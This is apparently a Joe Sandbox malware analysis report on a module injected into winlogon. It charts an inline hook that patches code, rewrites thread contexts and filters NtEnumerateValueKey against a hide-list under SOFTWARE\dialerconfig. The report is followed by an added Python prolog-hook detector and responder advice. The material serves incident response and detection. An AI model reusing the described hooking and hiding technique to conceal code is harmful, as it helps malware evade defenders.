8294 2d0165e5c00 8292->8294 8293->8294 8668 2d0165f5165 8669 2d0165e9a64 _CreateFrameInfo 9 API calls 8668->8669 8670 2d0165f517d 8669->8670 8671 2d0165e9a64 _CreateFrameInfo 9 API calls 8670->8671 8672 2d0165f5198 8671->8672 8673 2d0165e9a64 _CreateFrameInfo 9 API calls 8672->8673 8674 2d0165f51ac 8673->8674 8675 2d0165e9a64 _CreateFrameInfo 9 API calls 8674->8675 8676 2d0165f51ee 8675->8676 8803 2d0165e83e4 8804 2d0165e9818 __std_exception_copy 49 API calls 8803->8804 8805 2d0165e840d 8804->8805 9253 2d0165e5664 9254 2d0165e566a 9253->9254 9265 2d0165e7ca0 9254->9265 9258 2d0165e56ce 9260 2d0165e5767 _invalid_parameter_noinfo 9260->9258 9262 2d0165e58ed 9260->9262 9278 2d0165e7870 9260->9278 9261 2d0165e59eb 9262->9261 9263 2d0165e5a67 VirtualProtect 9262->9263 9263->9258 9264 2d0165e5a93 GetLastError 9263->9264 9264->9258 9266 2d0165e7cab 9265->9266 9267 2d0165e56ad 9266->9267 9268 2d0165ebc8c __free_lconv_mon 2 API calls 9266->9268 9269 2d0165e7cca 9266->9269 9267->9258 9274 2d0165e40f0 9267->9274 9268->9266 9272 2d0165e7cd5 9269->9272 9284 2d0165e84cc 9269->9284 9288 2d0165e84ec 9272->9288 9275 2d0165e410d 9274->9275 9277 2d0165e417c _invalid_parameter_noinfo 9275->9277 9292 2d0165e4360 9275->9292 9277->9260 9279 2d0165e78b7 9278->9279 9317 2d0165e7640 9279->9317 9282 2d0165e7d70 _log10_special 8 API calls 9283 2d0165e78e1 9282->9283 9283->9260 9285 2d0165e84da std::bad_alloc::bad_alloc 9284->9285 9286 2d0165e98d0 Concurrency::cancel_current_task 2 API calls 9285->9286 9287 2d0165e84eb 9286->9287 9289 2d0165e84fa std::bad_alloc::bad_alloc 9288->9289 9290 2d0165e98d0 Concurrency::cancel_current_task 2 API calls 9289->9290 9291 2d0165e7cdb 9290->9291 9293 2d0165e43a7 9292->9293 9294 2d0165e4384 9292->9294 9295 2d0165e43dd 9293->9295 9312 2d0165e3f40 9293->9312 9294->9293 9306 2d0165e3e10 9294->9306 9298 2d0165e3f40 2 API calls 9295->9298 9299 2d0165e440d 9295->9299 9298->9299 9303 2d0165e3e10 3 API calls 9299->9303 9305 2d0165e4443 9299->9305 9300 2d0165e3e10 3 
API calls 9301 2d0165e445f 9300->9301 9302 2d0165e447b 9301->9302 9304 2d0165e3f40 2 API calls 9301->9304 9302->9277 9303->9305 9304->9302 9305->9300 9305->9301 9309 2d0165e3e31 _invalid_parameter_noinfo 9306->9309 9307 2d0165e3ea0 9307->9293 9308 2d0165e3e86 VirtualQuery 9308->9307 9308->9309 9309->9307 9309->9308 9310 2d0165e3eba VirtualAlloc 9309->9310 9310->9307 9311 2d0165e3eeb GetLastError 9310->9311 9311->9309 9314 2d0165e3f58 _invalid_parameter_noinfo 9312->9314 9313 2d0165e3fad VirtualQuery 9313->9314 9315 2d0165e3fc7 9313->9315 9314->9313 9314->9315 9316 2d0165e4012 GetLastError 9314->9316 9315->9295 9316->9314 9316->9315 9318 2d0165e765b 9317->9318 9319 2d0165e767f 9318->9319 9320 2d0165e7671 SetLastError 9318->9320 9319->9282 9320->9319 9321 2d0165e9664 9328 2d0165e9bac 9321->9328 9324 2d0165e9671 9329 2d0165e9bb4 9328->9329 9331 2d0165e9be5 9329->9331 9332 2d0165e966d 9329->9332 9345 2d0165ea470 9329->9345 9333 2d0165e9bf4 __vcrt_uninitialize_locks DeleteCriticalSection 9331->9333 9332->9324 9334 2d0165e9b40 9332->9334 9333->9332 9350 2d0165ea344 9334->9350 9346 2d0165ea1f4 __vcrt_InitializeCriticalSectionEx 5 API calls 9345->9346 9347 2d0165ea4a6 9346->9347 9348 2d0165ea4bb InitializeCriticalSectionAndSpinCount 9347->9348 9349 2d0165ea4b0 9347->9349 9348->9349 9349->9329 9351 2d0165ea1f4 __vcrt_InitializeCriticalSectionEx 5 API calls 9350->9351 9352 2d0165ea369 TlsAlloc 9351->9352 8677 2d0165ec964 8680 2d0165ec714 8677->8680 8687 2d0165ec6dc 8680->8687 8685 2d0165ec698 11 API calls 8686 2d0165ec747 8685->8686 8688 2d0165ec6ec 8687->8688 8689 2d0165ec6f1 8687->8689 8690 2d0165ec698 11 API calls 8688->8690 8691 2d0165ec6f8 8689->8691 8690->8689 8692 2d0165ec70d 8691->8692 8693 2d0165ec708 8691->8693 8692->8685 8694 2d0165ec698 11 API calls 8693->8694 8694->8692 9354 2d0165e7c60 9355 2d0165e7c7c 9354->9355 9356 2d0165e7c81 9354->9356 9358 2d0165e7d90 9355->9358 9359 2d0165e7e27 9358->9359 9360 2d0165e7db3 GetSystemTimeAsFileTime GetCurrentThreadId 
GetCurrentProcessId QueryPerformanceCounter 9358->9360 9359->9356 9360->9359 9361 2d0165efc60 GetProcessHeap 8806 2d0165f39db 8807 2d0165f3a1b 8806->8807 8809 2d0165f3c80 8806->8809 8808 2d0165f3c62 8807->8808 8807->8809 8811 2d0165f3a4f 8807->8811 8814 2d0165f4790 8808->8814 8810 2d0165f3c76 8809->8810 8813 2d0165f4790 _log10_special 20 API calls 8809->8813 8813->8810 8817 2d0165f47b0 8814->8817 8819 2d0165f47ca 8817->8819 8818 2d0165f47ab 8818->8810 8819->8818 8821 2d0165f45f0 8819->8821 8822 2d0165f4630 _log10_special 8821->8822 8823 2d0165f469c _log10_special 8822->8823 8832 2d0165f48b0 8822->8832 8825 2d0165f46d9 8823->8825 8826 2d0165f46a9 8823->8826 8839 2d0165f4be0 8825->8839 8835 2d0165f44cc 8826->8835 8829 2d0165f46d7 _log10_special 8830 2d0165e7d70 _log10_special 8 API calls 8829->8830 8831 2d0165f4701 8830->8831 8831->8818 8845 2d0165f48d8 8832->8845 8836 2d0165f4510 _log10_special 8835->8836 8837 2d0165f4525 8836->8837 8838 2d0165f4be0 _log10_special 11 API calls 8836->8838 8837->8829 8838->8837 8840 2d0165f4be9 8839->8840 8841 2d0165f4c00 8839->8841 8843 2d0165edadc __free_lconv_mon 11 API calls 8840->8843 8844 2d0165f4bf8 8840->8844 8842 2d0165edadc __free_lconv_mon 11 API calls 8841->8842 8842->8844 8843->8844 8844->8829 8846 2d0165f4917 _raise_exc _clrfp 8845->8846 8847 2d0165f4b2c RaiseException 8846->8847 8848 2d0165f48d2 8847->8848 8848->8823 9362 2d0165e2a58 9364 2d0165e2aac 9362->9364 9363 2d0165e2ac7 9364->9363 9366 2d0165e33f8 9364->9366 9367 2d0165e348e 9366->9367 9369 2d0165e341d 9366->9369 9367->9363 9368 2d0165e3c74 StrCmpNIW 9368->9369 9369->9367 9369->9368 9370 2d0165e1d0c StrCmpIW StrCmpW 9369->9370 9370->9369 8695 2d0165ed558 8696 2d0165ed568 8695->8696 8697 2d0165ed3d0 __free_lconv_mon 11 API calls 8696->8697 8698 2d0165ed573 __vcrt_uninitialize_ptd 8696->8698 8697->8698 8849 2d0165eb7d4 8856 2d0165eb707 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8849->8856 8850 2d0165eb7fb 8851 2d0165e9a64 _CreateFrameInfo 9 API 
                                                          [Call graph, remainder (rendered as an image; only the node list survived extraction). Functions of the module at 000002D0165E0000 and the Windows APIs they reach:
                                                          2d0165e60d3: GetThreadContext, SetThreadContext, ResumeThread, VirtualProtect, FlushInstructionCache, VirtualFree (thread context rewrite combined with code patching)
                                                          2d0165e597d: VirtualProtect, GetLastError
                                                          2d0165e2604 / 2d0165e23f8: GetFileType, GetFinalPathNameByHandleW, StrCpyW, StrCatW, StrCmpIW, StrCmpNIW, lstrlenW, PathCombineW (path normalisation and comparison)
                                                          2d0165e2bf4: GetModuleHandleA, GetProcAddress, StrCmpW, StrCmpIW, StrCmpNIW, lstrlenW
                                                          2d0165ef484: GetCommandLineA, GetCommandLineW
                                                          2d0165efa3c / 2d0165ecde8 / 2d0165ecdcc / 2d0165ece20: InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection
                                                          2d0165ea41c: TlsSetValue
                                                          2d0165e8630: IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess (CRT fail-fast path)
                                                          The remaining nodes are statically linked CRT internals (_CreateFrameInfo, __FrameHandler3, __free_lconv_mon, _invalid_parameter_noinfo, __std_exception_copy/__std_exception_destroy, __vcrt_InitializeCriticalSectionEx, __scrt_dllmain_exception_filter).]

                                                          Control-flow Graph

                                                          [Graph rendered as an image; legend: executed / not executed. Function 2d0165e2990-2d0165e2a56: calls NtEnumerateValueKey at two sites (2d0165e29da and 2d0165e2a09) and the string-compare subroutine 2d0165e3c74 (StrCmpNIW) inside a loop (2d0165e2a1e back to 2d0165e29e6); after the compare the function either returns or enumerates the next value, a shape consistent with a hook that filters enumeration results.]
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: EnumerateValue
                                                          • String ID:
                                                          • API String ID: 1749906896-0
                                                          • Opcode ID: 02ad5e92296fcb81618173faf02e6502a770973b3644f5fa5863a03f8eb30bb4
                                                          • Instruction ID: 606513798a674d745bee18d13d3790bac6d00b0e698f942fa88182f8053d0d90
                                                          • Opcode Fuzzy Hash: 02ad5e92296fcb81618173faf02e6502a770973b3644f5fa5863a03f8eb30bb4
                                                          • Instruction Fuzzy Hash: 3F219D323147918AE7748F56AC8462EF7A4F784BD0FD1812ADE9953B68DF75C941C700

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-2879589442
                                                          • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction ID: d3924993ba69a97cbb640120d18c926c77fb927efbb2cd3c3158469372b4aaa9
                                                          • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction Fuzzy Hash: 84711836210A9086EB209FB2ECD8B9973A5F784B89F801112DE4E47B78EF39C954C744

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction ID: 3b414060dabd0ec2e9254b323d1504b4e4152d4d307d5e49c66db89ab63d7900
                                                          • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction Fuzzy Hash: 2C118E36700B9082EF549B65E888769B365FB48B94F94042ADE8D03765EF3ECA448714

                                                          Control-flow Graph

                                                          [Graph rendered as an image; legend: executed / not executed. Function 2d0165e5f60-2d0165e63f6: GetCurrentThreadId, then GetThreadContext (2d0165e60ec), SetThreadContext (2d0165e616e), VirtualProtect followed by FlushInstructionCache (2d0165e6271) and ResumeThread (2d0165e6367); subcalls include 2d0165e4810 (VirtualFree), 2d0165e5220, 2d0165e3da0, 2d0165e3d30 and 2d0165e7d70.]
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 29e89488c60d02e571c563a50b12f5ffc17bf35334ed45369d38bbcd13da9428
                                                          • Instruction ID: 9662dead72aeb1811aaee060e3677146b33180affbabf47c8df6dc80c19f8b34
                                                          • Opcode Fuzzy Hash: 29e89488c60d02e571c563a50b12f5ffc17bf35334ed45369d38bbcd13da9428
                                                          • Instruction Fuzzy Hash: 8AD19B76208B9886DB709B96E89435AB7A0F7C8B84F500117EACD47BB5DF3DCA41CB10
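                                                          The two graphs above are the two halves of a user-mode inline hook: the routine at 2d0165e5f60 rewrites thread contexts and calls VirtualProtect and FlushInstructionCache before ResumeThread (the write over a function prolog), and the routine at 2d0165e2990 wraps NtEnumerateValueKey in a compare-and-skip loop (the filter that runs in its place). The check a responder wants is whether a process's copy of an ntdll export still matches the on-disk image, and if not, where the patched prolog jumps. The Python below is an added example, not code from the report or from the sample. The stub bytes, the ntdll and trampoline addresses, and every export name except NtEnumerateValueKey are constructed for illustration; HANDLER_VA reuses the address of the function from the graph above only as a plausible far-away hook target.

```python
"""Prolog-hook check for x64 Windows exports.

Added example, not part of the Joe Sandbox report. All byte strings and
addresses below are constructed; in practice read the in-memory prolog with
ReadProcessMemory from a separate, unhooked process and take the on-disk
prolog from the module file with relocations applied.
"""
from dataclasses import dataclass
import struct
from typing import Optional

PROLOG_LEN = 16          # enough to cover every trampoline shape classified below
U64 = 0xFFFFFFFFFFFFFFFF


@dataclass(frozen=True)
class HookFinding:
    function: str
    kind: str             # none | jmp_rel32 | mov_rax_jmp | jmp_rip_indirect | push_ret | unknown_patch
    target: Optional[int] # hook destination when the encoding states it


def classify_patch(mem: bytes, func_va: int) -> tuple[str, Optional[int]]:
    """Recognise the trampolines commonly written over a prolog and resolve their target."""
    if mem[0] == 0xE9:                                        # E9 rel32: jmp near, relative to next insn
        rel = struct.unpack_from("<i", mem, 1)[0]
        return "jmp_rel32", (func_va + 5 + rel) & U64
    if mem[:2] == b"\x48\xb8" and mem[10:12] == b"\xff\xe0":  # mov rax, imm64 ; jmp rax
        return "mov_rax_jmp", struct.unpack_from("<Q", mem, 2)[0]
    if mem[:2] == b"\xff\x25":                                # FF 25 rel32: jmp qword [rip+rel32]
        rel = struct.unpack_from("<i", mem, 2)[0]
        return "jmp_rip_indirect", (func_va + 6 + rel) & U64  # address of the pointer slot, deref separately
    if len(mem) > 5 and mem[0] == 0x68 and mem[5] == 0xC3:    # push imm32 ; ret (imm32 is sign-extended)
        return "push_ret", struct.unpack_from("<i", mem, 1)[0] & U64
    return "unknown_patch", None


def detect_hook(function: str, func_va: int, disk: bytes, mem: bytes) -> HookFinding:
    """disk: prolog bytes from the module file; mem: the same bytes read from the live process."""
    if disk[:PROLOG_LEN] == mem[:PROLOG_LEN]:
        return HookFinding(function, "none", None)
    kind, target = classify_patch(mem, func_va)
    return HookFinding(function, kind, target)


def scan(exports: dict[str, tuple[int, bytes, bytes]]) -> list[HookFinding]:
    """exports: name -> (virtual address in the process, on-disk prolog, in-memory prolog)."""
    return [detect_hook(name, va, disk, mem) for name, (va, disk, mem) in exports.items()]


def jmp_rel32(from_va: int, to_va: int) -> bytes:
    """Encode a near jump. It fails when the handler lies outside +/-2 GiB, which is why a
    hook into a module loaded far from ntdll needs an absolute jump or a nearby trampoline page."""
    disp = to_va - (from_va + 5)
    if not -2**31 <= disp < 2**31:
        raise ValueError("target not reachable with rel32")
    return b"\xe9" + struct.pack("<i", disp)


# ---- constructed sample input -------------------------------------------------
# Shape of an ntdll x64 syscall stub: mov r10, rcx ; mov eax, <ssn> ; <wow64 test> ; syscall ; ret.
# The SSN field is zeroed: it is a placeholder, not a claim about any Windows build.
CLEAN_STUB = bytes.fromhex("4c8bd1" "b800000000" "f604250803fe7f01" "7503" "0f05" "c3")
NTDLL_FUNC_VA = 0x00007FFD9A4D2B10           # where the export sits in the scanned process (constructed)
TRAMPOLINE_VA = NTDLL_FUNC_VA + 0x20000      # a code page allocated near ntdll (constructed)
HANDLER_VA = 0x000002D0165E2990              # the NtEnumerateValueKey caller from the graph above

HOOKED_MOV_RAX = b"\x48\xb8" + struct.pack("<Q", HANDLER_VA) + b"\xff\xe0" + CLEAN_STUB[12:]
HOOKED_JMP_REL = jmp_rel32(NTDLL_FUNC_VA + 0x40, TRAMPOLINE_VA) + CLEAN_STUB[5:]
HOOKED_INT3 = b"\xcc" + CLEAN_STUB[1:]

SAMPLE_EXPORTS = {
    "NtEnumerateValueKey": (NTDLL_FUNC_VA, CLEAN_STUB, HOOKED_MOV_RAX),      # far handler: absolute jump
    "NtExportB": (NTDLL_FUNC_VA + 0x40, CLEAN_STUB, HOOKED_JMP_REL),         # illustrative name, near trampoline
    "NtExportC": (NTDLL_FUNC_VA + 0x80, CLEAN_STUB, HOOKED_INT3),            # illustrative name, unrecognised patch
    "NtExportD": (NTDLL_FUNC_VA + 0xC0, CLEAN_STUB, CLEAN_STUB),             # illustrative name, untouched
}

if __name__ == "__main__":
    for f in scan(SAMPLE_EXPORTS):
        if f.kind != "none":
            tgt = f"-> {f.target:#018x}" if f.target is not None else ""
            print(f"{f.function}: {f.kind} {tgt}")
```

                                                          Two caveats when running this for real. The sample hooks the query functions of the process it lives in (here winlogon, per the snapshot file name), so the comparison has to be driven from a process the sample has not injected, and the on-disk bytes must come from the file rather than from any in-process view of the module. And a mismatch alone is not a verdict: EDR products install the same kind of prolog hook, so resolve each target to its owning module; a target inside an image with no backing file on disk, or inside a region like the one the report dumps at 000002D0165E0000, is the tell. The strings of the routine at 2d0165e2990's neighbour (SOFTWARE\dialerconfig with paths, pid, process_names, service_names, startup, tcp_local, tcp_remote, udp) read like the hide-list that such a filter consults; whether that key is visible depends on whether the querying process is hooked, so confirm it from an unhooked process or from an offline copy of the hive.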

                                                          Control-flow Graph

                                                          [Graph rendered as an image; legend: executed / not executed. Function 2d0165e5500-2d0165e5b0a: GetCurrentThreadId (2d0165e5586), then VirtualProtect (2d0165e59f8-2d0165e5a91) with GetLastError on failure (2d0165e5a93); subcalls 2d0165e5b10, 2d0165e7ca0, 2d0165e47c0, 2d0165e7cdc, 2d0165e40f0, 2d0165e9090, 2d0165e7870, 2d0165e4490, 2d0165e49c0, 2d0165e89f0, 2d0165e4940, 2d0165e48a0.]
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 0f8d15ac30c01b929645c95d941df682bce9e25f3ebbd2babceaff1beb100a48
                                                          • Instruction ID: 91d6774ad46c386235acd3a2e63854d7d01febc248d6cb54e622c25492326936
                                                          • Opcode Fuzzy Hash: 0f8d15ac30c01b929645c95d941df682bce9e25f3ebbd2babceaff1beb100a48
                                                          • Instruction Fuzzy Hash: B302CB32619BC486EB60CB95F89435AF7A0F3C4794F504116EA8E87B68DF7EC954CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$AllocLibraryLoad
                                                          • String ID:
                                                          • API String ID: 3316853933-0
                                                          • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction ID: 6a883d376ffeba66a98c24e7e112f70bcf90b52d4dac6bcf29a405d078b72779
                                                          • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction Fuzzy Hash: 4591367270129187EB64CF66D88877D7B99FB54BD4F94C1269E0E0BB98DA38DC12C780

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocQuery
                                                          • String ID:
                                                          • API String ID: 31662377-0
                                                          • Opcode ID: dece628dfa6b96fb4fa24b2af5206c26f3a407fbee04769110ae8374df39886d
                                                          • Instruction ID: 78a2d3ce8583cb03db523573b82d5d590513b3113fa3180013c3514e51ab8cc0
                                                          • Opcode Fuzzy Hash: dece628dfa6b96fb4fa24b2af5206c26f3a407fbee04769110ae8374df39886d
                                                          • Instruction Fuzzy Hash: 7B31E322619AC5C1EF31DA95E89835AE6A4F384784F900526F5CD46BB9DF7ECB50CB00

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 000002D0165E3639
                                                          • PathFindFileNameW.SHLWAPI ref: 000002D0165E3648
                                                            • Part of subcall function 000002D0165E3C74: StrCmpNIW.SHLWAPI(?,?,?,000002D0165E254B), ref: 000002D0165E3C8C
                                                            • Part of subcall function 000002D0165E3BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002D0165E365F), ref: 000002D0165E3BCE
                                                            • Part of subcall function 000002D0165E3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002D0165E365F), ref: 000002D0165E3BFC
                                                            • Part of subcall function 000002D0165E3BC0: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002D0165E365F), ref: 000002D0165E3C1E
                                                            • Part of subcall function 000002D0165E3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002D0165E365F), ref: 000002D0165E3C39
                                                            • Part of subcall function 000002D0165E3BC0: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002D0165E365F), ref: 000002D0165E3C5A
                                                          • CreateThread.KERNELBASE ref: 000002D0165E368F
                                                            • Part of subcall function 000002D0165E1D40: GetCurrentThread.KERNEL32 ref: 000002D0165E1D4B
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction ID: cb990258ece807ccee5563a4393ff2456787588b0a0e4b09880717b483ecbb5f
                                                          • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction Fuzzy Hash: B9115230A106C181FF709BF0ACCD399A695BB64345FD04127D50E456F6DF7ACE488A00

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                          • String ID:
                                                          • API String ID: 3733156554-0
                                                          • Opcode ID: c4bf4fdd1f139f7af51c663d4a05522b228e983f2573c9d1742d6a00230fc506
                                                          • Instruction ID: 2cedec1f4289c30b6c331ced25801c0d626d4383081f33ab3ac7db6053c34f55
                                                          • Opcode Fuzzy Hash: c4bf4fdd1f139f7af51c663d4a05522b228e983f2573c9d1742d6a00230fc506
                                                          • Instruction Fuzzy Hash: 68F03026618B84C0DB30EB81EC8535EA7A0F3987D4F940117FA8D03B79DB3ACA80CB00

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 000002D0165E1628: GetProcessHeap.KERNEL32 ref: 000002D0165E1633
                                                            • Part of subcall function 000002D0165E1628: HeapAlloc.KERNEL32 ref: 000002D0165E1642
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E16B2
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E16DF
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E16F9
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E1719
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.KERNELBASE ref: 000002D0165E1734
